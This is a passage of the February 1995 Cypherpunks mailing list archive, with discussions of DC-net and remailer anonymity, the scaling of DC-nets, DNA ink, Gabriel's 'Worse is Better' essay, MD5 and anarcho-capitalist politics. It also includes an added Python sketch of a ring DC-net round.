remailers) only provides conditional (U-way) s anonymity (conditional
on there existing at least one trusted remailer in the chain, and on
the existence of strong cryptosystems).  The repool protocol also
suffers from TA attacks like those suggested by Wei (at least as
currently implemented).

  What we would like is for the work to scale sub-linearly (ideally
exp(-U)) with the number of users U.  Said another way, we would like
U to scale faster than linearly as a function of the work (ideally
exp(W)).  If the effort of a protocol scales linearly (or worse) with
U, I don't think it will become widely employed.  Even better would be
a system which provided s/r anonymity without using multicast
bandwidths at all.  Btw, what is the cost of multicast v.s. narrowcast
(say SMTP based) today on the net?

  Noyb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 6 Feb 95 20:46:27 PST
To: Wei Dai <weidai@eskimo.com>
Subject: Re: (dis)advantages of DC-Net vs remailers
In-Reply-To: <199502070328.AA11135@mail.eskimo.com>
Message-ID: <Pine.3.89.9502062012.A1613-0100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Feb 1995, Wei Dai wrote:
 
> I think over the long run the last factor will be most important.  In 
> a DC-Net, for each bit one participant wants to send to another, EVERY
> OTHER participant must broadcast a bit to ALL participants.  I can 
> imagine a remailer-net with one million users, but I don't see any 
> possibility that a DC-Net can be scaled to that size.

Not so -- you merely have to broadcast to enough people.  
But then the topology, and hence the complexity, gets worse.

This however merely reduces the bandwidth waste from n^2 to n*lg(n)


A further wrinkle -- forming DC nets of DC nets, can reduce the
bandwidth waste to lg(n)^2, which should scale adequately to cover
the cosmos, but then the complexity gets really scary.

And when you try to figure how to deal with denial of service
attacks in a big DC net that tries to use bandwidth with
tolerable efficiency -- I don't know if anyone has figured out
what would be involved -- I certainly have not.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usenet@agate.berkeley.edu (Usenet Administration)
Date: Mon, 6 Feb 95 20:49:57 PST
To: cypherpunks@toad.com
Subject: Automatic Echo of Test Posting
Message-ID: <199502070449.UAA23007@agate.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is an automatic echo of your posting to *.test.

Your header as received by this site follows.

If you don't want to get this message, please put the words "No Reply", 
or "Ignore" in the header of your posting.

        NNTP service with a :-)

rob robertson                agate!usenet             usenet@agate.berkeley.edu
-------------------------------------------------------------------------------

    Path: agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
    Subject: lwall
    Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
    NNTP-Posting-Host: ack.berkeley.edu
    Organization: cypherpunks
    Lines: 2
    From: cypherpunks@toad.com
    Distribution: world
    Newsgroups: alt.test
    Date: 6 Feb 1995 19:34:19 GMT






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 6 Feb 95 20:55:55 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <Pine.SV4.3.91.950206191208.28669C-100000@xcalibur>
Message-ID: <Pine.3.89.9502062024.A1613-0100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Feb 1995, Jonathan Cooper wrote:
>     You've obviously never attempted to get a Windows product working for 
> someone whose previous experience with a computer is limited to "Solitaire".
> 
>     I've done work with this ISP, and I can tell you it's nearly the most 
> frustrating experience I've had in my life -- Windows has bizarre 
> conflicts with software eating other software, ports getting set up 
> wrong, and just general nastiness.  Even the slickest software needs 
> helpline time - for whatever reason.

Some software needs more than others.

Central Points desktop for windows -- a very complex and powerful 
product, had quite low help line costs.

On the other hand the messy and confused windows internet utilities,
produced by diverse people, often crudely ported from Unix by 
shareware operators who could not afford the time and effort 
for a proper setup program, or crudely ported by people who may 
have been Unix experts but most obviously were not windows
experts, (example: ftp softwares terminal emulator) are a total 
disaster, and this is why the help cost for SLIP lines is so 
high.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 6 Feb 95 21:37:24 PST
To: cypherpunks@toad.com
Subject: Re: New directions in anonymity (needed)
Message-ID: <199502070522.VAA27293@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Noyb, anonymous-remailer@shell.portal.com
>   So, let's look at the
> cost of attaining anonymity.  For U people to communicate M bits (total
> -- 2 people each sending 2 bits is M==4) s/r anonymously takes O(U*M)
> bits multicast bandwidth for Chaum's DC protocol, but the repool
> protocol uses only O(h*M) bits narrowcast bandwidth plus O(M) bits
> multicast bandwidth (Where h is the average number of remailer hops,
> expected to be a constant wrt U and M, smaller than U, and much smaller
> than M).

The repool could actually be somewhat worse than this.  Wei has
shown that if you don't send every tick then statistical information
builds up surprisingly quickly to link senders and probable receivers,
especially if there is a pair communicating frequently over a long period
of time, arguably one of the main forms of usage of these nets.  So
everyone has to send all the time at the rate of the maximum per-user
rate accepted by the remailers (say, one packet per tick).  If this rate
is considerably above the actual average communication rate of a given
user then this will be much higher than O(h*M) (although granted it will
not scale directly with U, increasing U will increase the desired packet
rate that would satisfy, say, 90% of users).

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 6 Feb 95 19:17:40 PST
To: Cypherpeople <cypherpunks@toad.com>
Subject: Remailer RFC
Message-ID: <Pine.SUN.3.91.950206221438.28091A-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


[ I shouldn't be posting -- I'm legally not supposed to be on the net. 
But hell... ]

I've been compiling and editing a remailer standards document, following 
the format of the Internet RFCs [mainly because I think it's elegant]. 
I'd be glad to make it a `formal' RFC, registered with the IETF... But I 
have no idea how it's done. If anyone out there wants to tell me how...

Michael
--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 6 Feb 95 20:23:16 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: dna ink
In-Reply-To: <ab5ca280040210043eb1@[132.162.201.201]>
Message-ID: <199502070417.WAA01434@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> Something I've been wondering is: Why can't one of your enemies just get a piece of
> your hair or fingernails or something, and make their own DNA ink out of
> your DNA?  They could probably even send it to this DNA ink company, and
> they'd make your enemy ink out of your own DNA without even noticing.
> Doesn't seem very secure to me.
> 
> [Yeah, it's not crypto related, but I've been wondering about this since
> the topic was first brought up, and am somewhat surprised that of the few
> messages there were making fun of the DNA ink,  none mentioned this fact.
> Is that because it's too obvious to mention, or is there something I'm not
> thinking about which makes DNA ink useful after all?]
> 
> 
This is the same problem that arose with the original idea of seals once
the skills of metalworking became common enough. By the 1500's it was
nearly impossible to keep a seal confidential more than a few weeks until
somebody got an impression and built a copy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 6 Feb 95 20:26:25 PST
To: entropy@IntNet.net (Jonathan Cooper)
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <Pine.SV4.3.91.950206191208.28669C-100000@xcalibur>
Message-ID: <199502070420.WAA01441@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
>     You've obviously never attempted to get a Windows product working for 
> someone whose previous experience with a computer is limited to "Solitaire".
> 
>     I've done work with this ISP, and I can tell you it's nearly the most 
> frustrating experience I've had in my life -- Windows has bizarre 
> conflicts with software eating other software, ports getting set up 
> wrong, and just general nastiness.  Even the slickest software needs 
> helpline time - for whatever reason.
> 
I have been doing help desk related work for nearly 10 years and in my 
experience 'user friendly' is something you see on ads and never in the
software.

I have yet to see a piece of software that is useful and actually solves
a problem or does a job that doesn't also require an investment by the
help desk.

It simply ain't that easy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 6 Feb 95 22:22:38 PST
To: weidai@eskimo.com
Subject: Re: a simple explanation of DC-Net
In-Reply-To: <199502070122.AA01568@mail.eskimo.com>
Message-ID: <199502070620.WAA29156@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:

> The DC-Net is not very easy to understand.  I'll try to explain the most
> important parts of the concept as simply as I can.
...nice explanation elided...

> P.S.  I realize someone has probably written something like this
> already, but I hope this explanation helps someone who is still
> puzzled.  If nothing else, it serves as a sanity check on my own
> understanding.

Yes, I wrote up a similar explanation for the Extropians list, in
mid-1992, before our list existed. (It's been redistributed here a
couple of times, and is in some of the CP archives and/or URLs reported
here.)

Eric Hughes and I did an anthropomorphic demo of DC-Nets a couple of
years ago, at the first CP meeting. That is, we got up in front of
folks and literally acted-out a simple transmission (and even this
took some minutes, to make clear the protocols, etc.).

My estimate is that the averagely bright Cypherpunk (which is to say,
_very_ bright person) can get the key ideas of DC-Nets in a few hours
of careful thinking and diagramming of the ideas in the paper, which
is of course archived at the Cypherpunks site (and probably readily
accessible in several URLs). By "key ideas" I mean the first 3-4
pages of the paper, where the ideas are laid out.

Issues of collusion and disruption are what Chaum spends most of his
1988 paper on, and start after the first introductory pages. Sub-nets,
to reduce collusion, for example. Later papers, such as those by the
Pfitzmanns and by Jurgen Bos, deal in much more detail with
disruption.

(By the way, I mentioned to Chaum, in Monte Carlo last week, our
continuing fascination with DC-Nets, despite the difficulties in fully
implementing/using them. Chaum was aware of the efforts by the Austin
group, and was pleased to hear that several parallel are continuing. I
got the impression that we are the only people in the world still
looking at this stuff, which is not as bad as it sounds. You see,
those writing papers have moved on to other things, whereas
Cypherpunks is a list devoted to practical implementations and
demonstrations, and few others are, so we have a continuing interest.
Chaum was very complimentary about the Cypherpunks.)

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 6 Feb 95 20:02:51 PST
To: Wei Dai <weidai@eskimo.com>
Subject: Re: a simple explanation of DC-Net
In-Reply-To: <199502070122.AA01568@mail.eskimo.com>
Message-ID: <Pine.SUN.3.91.950206224622.21262B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Feb 1995, Wei Dai wrote:

> P.S.  I realize someone has probably written something like this
> already, but I hope this explanation helps someone who is still
> puzzled.

I've written a test-bed IRC client which uses DC Nets to allow multiple 
people to talk on an IRC channel anonymously.  It operates in a ring, 
with every participant sharing his/her random bit stream with the 
neighbor to the "left."  Participants compare their bit stream with the 
one their neighbor shares with them, and broadcast the differences 
(with lies indicating xmitted "1" bit) to all participants.  The 
difference bits for each round are totalled together modulo 2 by each 
participant, and any anonymous broadcasts can be determined from those 
totals.

My implementation was a quick project for a class and lacks some really 
important features:

1)  used built-in PRNG
2)  does not encrypt private messages for bit stream sharing between 
neighbors
3)  no ALOHA or similar protocol for dealing with message collisions
4)  ring could be expanded to more complex graph to increase number of
    colluding participants needed to break anonymity.

BTW - There have been a few other papers on DC-Nets since Chaum including 
detections of DC-Net disrupters, and protection against a group of active 
attacks.  I include a report with my code now available at 
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/applications/dc-irc.alpha.tar.gz
which goes into more details on these matters and has references.

-Thomas
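
The ring DC-net round described in the message above, as an added Python sketch (not the dc-irc code, which this archive does not include). The function names, the byte-wise rounds, and the use of `secrets` for the shared pads are assumptions made here; the sketch also shows the collision and neighbour-collusion cases from the list of missing features.

```python
import secrets


def xor_bytes(*chunks):
    """XOR equal-length byte strings together (addition modulo 2, bit by bit)."""
    if len({len(c) for c in chunks}) != 1:
        raise ValueError("all chunks must have the same length")
    out = bytearray(len(chunks[0]))
    for chunk in chunks:
        for k, b in enumerate(chunk):
            out[k] ^= b
    return bytes(out)


def shared_pads(n, nbytes):
    """pads[i] is the secret pad shared by participant i and its left
    neighbour (i - 1) % n. Drawn from the OS CSPRNG, not a built-in PRNG."""
    return [secrets.token_bytes(nbytes) for _ in range(n)]


def announcement(i, pads, message=None):
    """What participant i broadcasts: the difference between the pad shared
    with the left neighbour and the pad shared with the right neighbour,
    inverted ("a lie") wherever the participant wants to transmit a 1 bit."""
    left = pads[i]
    right = pads[(i + 1) % len(pads)]
    out = xor_bytes(left, right)
    if message is not None:
        out = xor_bytes(out, message)
    return out


def run_round(n, nbytes, senders):
    """Run one round. senders maps participant index -> message of nbytes.
    Returns (pads, announcements, combined broadcast)."""
    if n < 3:
        raise ValueError("a ring needs at least three participants")
    pads = shared_pads(n, nbytes)
    announcements = [announcement(i, pads, senders.get(i)) for i in range(n)]
    # Every pad appears in exactly two announcements, so all pads cancel
    # and only the XOR of the transmitted messages remains.
    return pads, announcements, xor_bytes(*announcements)


def unmask_by_neighbours(i, pads, announcements):
    """Collusion check for a plain ring: if both neighbours of participant i
    pool the pads they share with i, they strip them from i's announcement
    and see exactly what i sent (all zero bytes if i was silent)."""
    return xor_bytes(announcements[i], pads[i], pads[(i + 1) % len(pads)])


if __name__ == "__main__":
    msg = b"hello".ljust(16, b"\0")  # constructed sample message

    # One sender: everyone recovers the message, no announcement names the sender.
    pads, ann, total = run_round(5, 16, {2: msg})
    print("combined:", total)

    # Two senders in the same round collide: the result is the XOR of both.
    _, _, clash = run_round(5, 16, {1: msg, 3: b"world".ljust(16, b"\0")})
    print("collision:", clash)

    # Participants 1 and 3 collude against participant 2.
    print("unmasked by neighbours:", unmask_by_neighbours(2, pads, ann))
```

In a ring, two colluding neighbours are enough to unmask the participant between them, which is why a denser key-sharing graph raises the number of colluders needed.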





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 6 Feb 95 20:08:28 PST
To: root <cypherpunks@toad.com
Subject: Re: dna ink
Message-ID: <ab5ca280040210043eb1@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:39 PM 02/06/95, root wrote:
>The blood is water soluble and many of the components break down over time. By
>injecting DNA (which has lifetimes measured in millions of years) in some kind
>of matrix (ie epoxy or cyanoacetates) it becomes possible to create a modern
>'seal' similar to the wax seals of yesteryear. In the case of the old seals it
>was not the wax which provided the protection but rather the symbology that was
>embedded in it (ie DNA).
>
>And you thought that T Rex forward from the dinosaur mailing list about DNA
>from dinosaur bones was unrelated to crypto......bwahahahahaha

Something I've been wondering is: Why can't one of your enemies just get a piece of
your hair or fingernails or something, and make their own DNA ink out of
your DNA?  They could probably even send it to this DNA ink company, and
they'd make your enemy ink out of your own DNA without even noticing.
Doesn't seem very secure to me.

[Yeah, it's not crypto related, but I've been wondering about this since
the topic was first brought up, and am somewhat surprised that of the few
messages there were making fun of the DNA ink,  none mentioned this fact.
Is that because it's too obvious to mention, or is there something I'm not
thinking about which makes DNA ink useful after all?]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MathWorks Autoresponder <usenet@mathworks.com>
Date: Mon, 6 Feb 95 20:50:18 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <199502070450.XAA05997@turing.mathworks.com>
MIME-Version: 1.0
Content-Type: text/plain


Your Usenet test article was received on Mon Feb  6 23:50:01 EST 1995 here at 
The MathWorks, Inc. in Natick, MA.  Natick, MA is about 20 miles 
west of Boston, MA.

You are receiving this message because you posted a test message to one of
the *.test newsgroups.

The MathWorks' news admin can be reached via e-mail at usenet@mathworks.com.
Please note that we do not offer news access to sites outside of our
organization.

If you want to suppress this message in the future, include the word "ignore" 
in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

All headers plus at most 10 lines of user text from your original article are
reproduced below for your perusal:

Path: news.mathworks.com!zombie.ncsc.mil!news.duke.edu!godot.cc.duq.edu!hudson.lm.com!news.pop.psu.edu!news.cac.psu.edu!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 6 Feb 95 21:01:19 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: dna ink
In-Reply-To: <ab5ca280040210043eb1@[132.162.201.201]>
Message-ID: <m0rbdOC-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> your DNA?  They could probably even send it to this DNA ink company, and
> they'd make your enemy ink out of your own DNA without even noticing.
> Doesn't seem very secure to me.
> 
> [Yeah, it's not crypto related, but I've been wondering about this since
> the topic was first brought up, and am somewhat surprised that of the few
> messages there were making fun of the DNA ink,  none mentioned this fact.
> Is that because it's too obvious to mention, or is there something I'm not
> thinking about which makes DNA ink useful after all?]
> 

A much more interesting spin on this would be a variety of ways to encode
throughout a substance in an inert but permanent way a public key.

Whether it's an easily identifiable molecule or some type of deep etching,
you could do things like mark all the parts of a car or all the paint,
fabric, plastic, etc. of a work of art.

DNA isn't very good really since it's mostly the same and based a lot
on probabilities.

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewall/WWW srvrs ICBM/GPS: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W wrk
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.28Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stig@hackvan.com (Stig)
Date: Tue, 7 Feb 95 01:25:16 PST
To: Shad '94 list <aa982@freenet.buffalo.edu>
Subject: The Rise of "Worse is Better"...
Message-ID: <m0rbm8e-0006DaC@hackvan.com>
MIME-Version: 1.0
Content-Type: text/plain



A while ago, I mentioned appendix C to the _Unix-Haters Handbook_ and someone
(Jason?) was interested in it.  I couldn't come up with the text of the
chapter until now because I didn't have it until now.

Look through the Lisp-specific jargon to see what RPG (the author) has to
say about the different priorities in getting a job done...  One school of
engineering follows "The Right Thing" approach, while the other uses the
"Worse is Better" (quick-and-dirty) approach.

    Stig
    
I have the .tex file for the article, and it's available on the WWW as
    http://www.ai.mit.edu/articles/good-news/good-news.html

-----------------------------------------------------------------------------

The Rise of ``Worse is Better''

I and just about every designer of Common Lisp and CLOS has had extreme
exposure to the MIT/Stanford style of design. The essence of this style can be
captured by the phrase ``the right thing.'' To such a designer it is important
to get all of the following characteristics right:

      Simplicity-the design must be simple, both in implementation and
     interface. It is more important for the interface to be simple than the
     implementation.

      Correctness-the design must be correct in all observable aspects.
     Incorrectness is simply not allowed.

      Consistency-the design must not be inconsistent. A design is allowed to
     be slightly less simple and less complete to avoid inconsistency.
     Consistency is as important as correctness.

      Completeness-the design must cover as many important situations as is
     practical. All reasonably expected cases must be covered. Simplicity is
     not allowed to overly reduce completeness.

I believe most people would agree that these are good characteristics. I will
call the use of this philosophy of design the ``MIT approach.'' Common Lisp
(with CLOS) and Scheme represent the MIT approach to design and implementation.

The worse-is-better philosophy is only slightly different:

      Simplicity-the design must be simple, both in implementation and
     interface. It is more important for the implementation to be simple than
     the interface. Simplicity is the most important consideration in a design.

      Correctness-the design must be correct in all observable aspects. It is
     slightly better to be simple than correct.

      Consistency-the design must not be overly inconsistent. Consistency can
     be sacrificed for simplicity in some cases, but it is better to drop those
     parts of the design that deal with less common circumstances than to
     introduce either implementational complexity or inconsistency.

      Completeness-the design must cover as many important situations as is
     practical. All reasonably expected cases should be covered. Completeness
     can be sacrificed in favor of any other quality. In fact, completeness
     must be sacrificed whenever implementation simplicity is jeopardized.
     Consistency can be sacrificed to achieve completeness if simplicity is
     retained; especially worthless is consistency of interface.

Early Unix and C are examples of the use of this school of design, and I will
call the use of this design strategy the ``New Jersey approach.'' I have
intentionally caricatured the worse-is-better philosophy to convince you that
it is obviously a bad philosophy and that the New Jersey approach is a bad
approach.

However, I believe that worse-is-better, even in its strawman form, has better
survival characteristics than the-right-thing, and that the New Jersey approach
when used for software is a better approach than the MIT approach.

Let me start out by retelling a story that shows that the MIT/New-Jersey
distinction is valid and that proponents of each philosophy actually believe
their philosophy is better.

Two famous people, one from MIT and another from Berkeley (but working on Unix)
once met to discuss operating system issues. The person from MIT was
knowledgeable about ITS (the MIT AI Lab operating system) and had been reading
the Unix sources. He was interested in how Unix solved the PC loser-ing
problem. The PC loser-ing problem occurs when a user program invokes a system
routine to perform a lengthy operation that might have significant state, such
as IO buffers. If an interrupt occurs during the operation, the state of the
user program must be saved. Because the invocation of the system routine is
usually a single instruction, the PC of the user program does not adequately
capture the state of the process. The system routine must either back out or
press forward. The right thing is to back out and restore the user program PC
to the instruction that invoked the system routine so that resumption of the
user program after the interrupt, for example, re-enters the system routine. It
is called ``PC loser-ing'' because the PC is being coerced into ``loser mode,''
where ``loser'' is the affectionate name for ``user'' at MIT.

The MIT guy did not see any code that handled this case and asked the New
Jersey guy how the problem was handled. The New Jersey guy said that the Unix
folks were aware of the problem, but the solution was for the system routine to
always finish, but sometimes an error code would be returned that signaled that
the system routine had failed to complete its action. A correct user program,
then, had to check the error code to determine whether to simply try the system
routine again. The MIT guy did not like this solution because it was not the
right thing.

The New Jersey guy said that the Unix solution was right because the design
philosophy of Unix was simplicity and that the right thing was too complex.
Besides, programmers could easily insert this extra test and loop. The MIT guy
pointed out that the implementation was simple but the interface to the
functionality was complex. The New Jersey guy said that the right tradeoff has
been selected in Unix-namely, implementation simplicity was more important than
interface simplicity.

The MIT guy then muttered that sometimes it takes a tough man to make a tender
chicken, but the New Jersey guy didn't understand (I'm not sure I do either).

Now I want to argue that worse-is-better is better. C is a programming language
designed for writing Unix, and it was designed using the New Jersey approach. C
is therefore a language for which it is easy to write a decent compiler, and it
requires the programmer to write text that is easy for the compiler to
interpret. Some have called C a fancy assembly language. Both early Unix and C
compilers had simple structures, are easy to port, require few machine
resources to run, and provide about 50%--80% of what you want from an operating
system and programming language.

Half the computers that exist at any point are worse than median (smaller or
slower). Unix and C work fine on them. The worse-is-better philosophy means
that implementation simplicity has highest priority, which means Unix and C are
easy to port on such machines. Therefore, one expects that if the 50%
functionality Unix and C support is satisfactory, they will start to appear
everywhere. And they have, haven't they?

Unix and C are the ultimate computer viruses.

A further benefit of the worse-is-better philosophy is that the programmer is
conditioned to sacrifice some safety, convenience, and hassle to get good
performance and modest resource use. Programs written using the New Jersey
approach will work well both in small machines and large ones, and the code
will be portable because it is written on top of a virus.

It is important to remember that the initial virus has to be basically good. If
so, the viral spread is assured as long as it is portable. Once the virus has
spread, there will be pressure to improve it, possibly by increasing its
functionality closer to 90%, but users have already been conditioned to accept
worse than the right thing. Therefore, the worse-is-better software first will
gain acceptance, second will condition its users to expect less, and third will
be improved to a point that is almost the right thing. In concrete terms, even
though Lisp compilers in 1987 were about as good as C compilers, there are many
more compiler experts who want to make C compilers better than want to make
Lisp compilers better.

The good news is that in 1995 we will have a good operating system and
programming language; the bad news is that they will be Unix and C++.

There is a final benefit to worse-is-better. Because a New Jersey language and
system are not really powerful enough to build complex monolithic software,
large systems must be designed to reuse components. Therefore, a tradition of
integration springs up.

How does the right thing stack up? There are two basic scenarios: the ``big
complex system scenario'' and the ``diamond-like jewel'' scenario.

The ``big complex system'' scenario goes like this:

First, the right thing needs to be designed. Then its implementation needs to
be designed. Finally it is implemented. Because it is the right thing, it has
nearly 100% of desired functionality, and implementation simplicity was never a
concern so it takes a long time to implement. It is large and complex. It
requires complex tools to use properly. The last 20% takes 80% of the effort,
and so the right thing takes a long time to get out, and it only runs
satisfactorily on the most sophisticated hardware.

The ``diamond-like jewel'' scenario goes like this:

The right thing takes forever to design, but it is quite small at every point
along the way. To implement it to run fast is either impossible or beyond the
capabilities of most implementors.

The two scenarios correspond to Common Lisp and Scheme.

The first scenario is also the scenario for classic artificial intelligence
software.

The right thing is frequently a monolithic piece of software, but for no reason
other than that the right thing is often designed monolithically. That is, this
characteristic is a happenstance.

The lesson to be learned from this is that it is often undesirable to go for
the right thing first. It is better to get half of the right thing available so
that it spreads like a virus. Once people are hooked on it, take the time to
improve it to 90% of the right thing.

A wrong lesson is to take the parable literally and to conclude that C is the
right vehicle for AI software. The 50% solution has to be basically right, and
in this case it isn't.

But, one can conclude only that the Lisp community needs to seriously rethink
its position on Lisp design. I will say more about this later.

rpg@lucid.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 6 Feb 95 22:37:39 PST
To: philip@cs.brandeis.edu (Philip Trauring)
Subject: Re: MD5 coding
In-Reply-To: <ab5c1c670202100461ba@[129.64.123.61]>
Message-ID: <199502070637.BAA17973@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> I am looking to put together an MD5 message digest program and have
> extracted the MD5.c and MD5.h files from PGP(excerpt of the MD5.h file
> below) but I'm not sure how it all works. Can someone who is familiar with
> the functions and the data structure please e-mail me with a bit of
> guidance as to what each one does and how to implement it. If anyone can
> lead me to a good description of the processes involved I would appreciate
> that too. Thanks.

Better than looking at sources, look for the file rsa.doc avail. from a lot
of crypto/security ftp-sites... specifically something called the MD5-A RFC
...? It explains the algorithm pretty well, and is what I used to write my
own assembler implementation with... better to work from an explanation of
the algorithm than from sources which you may or may not understand what is
going on.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 02:07:17 PST
To: rfdutcher@igc.apc.org
Subject: Corporate Fascism, Rand, Greens, Oh My!
In-Reply-To: <199501302310.PAA13622@mail.igc.apc.org>
Message-ID: <199502071005.CAA25848@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I just saw this older message as I waded through the 700 messages
which accumulated during my absence (and since my return, too). I
know there will be some who see no crypto relevance in this, but
that's just too bad. I've seen endless OS flame war posts, endless
flames about "can't we get back to crypto?" (often from the OS
flamers, ironically), so my foray into anarcho-capitalism is at least
as related to Cypherpunks issues. 

Besides, I want to respond to my old friend Rich.

Richard F. Dutcher wrote:

> Do you assume privacy and protection from arbitrary power are solely 
> libertarian concerns?  If so, educate yourself and check out the ACLU 
> and Amnesty International ...
> 
> I even know lots of crypto-anarcho-libbers [or whatever Tim May is 
> calling them nowadays ;-] who are willing to concede, under pressure, 
> that unfettered corporations can be as dangerous to freedom as any 
> government.

It doesn't even take any pressure for me to concede this, although
there are some subtleties about what "unfettered" means, and what
options corporations have to stifle competitors by using State power.

The Randian ideal (well, "ideal" for many of us who cut our teeth on
"Atlas Shrugged" while future commie wimp-simps were studying
"Jonathan Livingston Seagull" :-}) is seldom met. Even in Rand and
Heinlein we find plenty of allegedly free-market corporations who cozy
up to the State, buy elections, impose bureaucratic laws they
know will stifle new competitors, etc. We saw them in Rand, with the
"Anti Dog-eat-Dog Law," and the various slacker companies, and we
certainly see it in the real world. Corporations that hire the police
to break strikes by breaking heads (and I mean strikers who are merely
not working, or who are walking a line); there's strike violence on
both sides, of course. Or corporations who pay bribes to bypass laws
(even "reasonable" laws that any libertarian would support, such as
law involving the dumping of toxic waste into streams). Or
corporations that use the legal and patent system to suppress
upstarts. (I could name a company I happen to know quite well, which
basically stole its starting seed products from the company it sprung
from, then later used the legal system and government laws to cleverly
stop some others from doing the same thing.)

As Mussolini so cogently put it, "corporatism is fascism." A State
that blesses Fiat and suppresses competitors, or that blesses Lockheed
through bailouts and exemptions from laws, is basically fascist.
(Fascist is a term with a socioeconomic meaning, not merely an epithet
or adjective.)

(As many of you may imagine, much of the hype about the Information
Superduperhighway--more suitably called the Infobahn--is explicitly
totalitarian, with large corporations slavering to get a piece of
the action! I have no problems with Cyberdyne Systems, for example,
installing new T2 links to where customers want more bandwidth. But
the I-way is a large boondoggle, with sociocrats and "cybercrats"
(apparently a new term from Mark Stahlman, which I like) trying to
plan the optimal society and with corporations pledging to "make the
packets run on time." Ughh!)

Make no mistake about it, strong crypto, what I call crypto anarchy,
will have as great an effect on corporate sizes, structures, and
